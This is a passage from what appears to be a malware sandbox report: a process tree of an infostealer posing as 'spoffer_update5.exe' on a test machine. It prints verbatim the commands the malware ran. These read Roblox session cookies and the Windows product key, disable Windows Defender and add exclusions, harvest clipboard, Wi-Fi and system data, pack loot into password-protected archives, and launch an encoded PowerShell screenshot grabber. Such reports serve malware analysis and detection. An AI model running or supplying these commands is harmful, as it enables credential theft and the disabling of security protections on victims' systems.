        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES17C5.tmp" "c:\Users\Admin\AppData\Local\Temp\33tua2yl\CSC7904255999DE4BD0A361A89A9E4F84E4.TMP"
        7⤵
        
        PID:5280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4832
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4688
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5588
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:996
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4520
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2432"
      4⤵
      PID:1692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2432
        5⤵
        Kills process with taskkill
        
        PID:2364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:3156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5336
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:2768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4800
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50242\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\A45Xs.zip" *"
      4⤵
      PID:6072
    - - C:\Users\Admin\AppData\Local\Temp\_MEI50242\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI50242\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\A45Xs.zip" *
        5⤵
        Executes dropped EXE
        
        PID:1760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:4876
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:6140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:4748
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3564
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:5868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5300
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:2928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4236
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:4844
- C:\Users\Admin\AppData\Local\Temp\RarSFX6\RunAsHelper.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX6\RunAsHelper.exe"
  2⤵
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  PID:3596

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5884

C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\spoffer_update5.exe
"C:\Users\Admin\Desktop\topg6565767677\topg6565767677\Runtime-Broker\spoffer_update5.exe"
1⤵
PID:3944
- C:\Users\Admin\AppData\Local\Temp\RarSFX7\Runtime Broker.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX7\Runtime Broker.exe"
  2⤵
  - Executes dropped EXE
  PID:5604
- C:\Users\Admin\AppData\Local\Temp\RarSFX7\spoffer.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX7\spoffer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3376
- C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe"
  2⤵
  - Executes dropped EXE
  PID:5272
- - C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe"
    3⤵
    - Executes dropped EXE
    PID:5716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe'"
      4⤵
      PID:5620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX7\runexehelper.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:4460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‍ ‏.scr'"
      4⤵
      PID:5256
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‍ ‏.scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:236
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4832
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:2684
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:5608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:4464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3584
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4088
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4072
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:6096
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        
        PID:4248
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cllb2dre\cllb2dre.cmdline"
        6⤵
        
        PID:4612
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1000.tmp" "c:\Users\Admin\AppData\Local\Temp\cllb2dre\CSC86F01EE92FD844F18CB2EDD9971BE6D5.TMP"
        7⤵
        
        PID:2724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1156
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4988
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3936
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5400
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5276
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2948
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2260
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:3420
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:1740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:2292
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:3644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI52722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\TuNH7.zip" *"
      4⤵
      PID:1332
    - - C:\Users\Admin\AppData\Local\Temp\_MEI52722\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI52722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\TuNH7.zip" *
        5⤵
        Executes dropped EXE
        
        PID:4200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:1624
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:1412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:5244
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2020
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:1884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:128
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5820
  - - C:\Windows\system32\cmd.exe
